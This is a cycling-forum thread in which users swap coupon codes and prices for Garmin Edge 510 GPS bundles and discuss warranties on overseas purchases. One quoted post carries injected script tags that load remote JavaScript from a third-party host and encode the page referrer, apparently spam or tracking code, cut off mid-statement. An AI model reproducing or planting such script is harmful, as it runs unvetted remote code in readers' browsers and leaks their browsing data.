Road Bike, Cycling Forums banner
1 - 16 of 16 Posts

·
Registered
453 Posts
Discussion Starter · #1 · (Edited)
Garmin Edge 510 GPS Bundle And Mount - Cyclocomputers

Copying this from another forum. I added it to the cart and the code 34785 worked for me. This is for the bundle with the high performance HR monitor like the current deal from Wiggle, but the 510 is color and you are buying from the US. (people on slickdeals are saying that Garmin won't honor the warranty if bought from overseas.)

Here's a link comparing the Edge 500 and 510 https://buy.garmin.com/shop/compare.do?cID=160&compareProduct=112885&compareProduct=36728
Color looks to be the biggest difference.

Nashbar has a 17% off sale with code 34785 when entered in the cart.

Garmin 510 bundle (speed/cadence and heart rate monitors, and extra mount) is 399.99.

when added to cart, without coupon it shows a $40 discount (not seen on item page). add coupon 34785 and total price after discount is $282.19, which is a total 29.5% discount.

Shipping for me is $13.99. YMMV given I don't know how long this will last as there is no advertised sale on the garmin, and it may revert to just 17% off if they fix it.

·
Registered
1,904 Posts
Looks like the bundle is out of stock right now, but the do have the individual 510 in stock. This code works with other Garmins too. I'm looking to get a Garmin 200 and it is down to $91 with 15% off + the 17% off code. Nice!

Thanks for pointing this out!

·
Registered
453 Posts
Discussion Starter · #4 ·
Looks like the bundle is out of stock right now, but the do have the individual 510 in stock. This code works with other Garmins too. I'm looking to get a Garmin 200 and it is down to $91 with 15% off + the 17% off code. Nice!

Thanks for pointing this out!
The Edge 500 bundle is in stock this morning for $275 shipped.

·
Registered
453 Posts
Discussion Starter · #8 ·
You can get the 510 bundle at Wiggle for around A$285 (should be under US$300). Use the code 15-EXTRA. I'd get them while they last.
Yeah, I bought mine on Wiggle, but some people are paranoid that Garmin won't honor the warranty in the USA. But it's a moot point because the Nashbar deal is dead and the Wiggle deal is still alive.

·
Registered
9 Posts
Yeah, I bought mine on Wiggle, but some people are paranoid that Garmin won't honor the warranty in the USA. But it's a moot point because the Nashbar deal is dead and the Wiggle deal is still alive.
I'm buying from Australia so don't have that issue. The law down here is the local distributor has to warrant the goods even if they are purchased overseas. I've had no problems with garmin australia fixing broken products. Great price on them.

·
Registered
255 Posts
You can get the 510 bundle at Wiggle for around A$285 (should be under US$300). Use the code 15-EXTRA. I'd get them while they last.<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
Many thanks, was sad this deal is off by now at nashbar...

·
HERKWO
726 Posts

·
Registered
172 Posts
If you go to BikeTiresDirect.com and sign up for their VIP Club (free) they send you a 15% off code which makes the Garmin 510 unit $280 shipped.

1 - 16 of 16 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.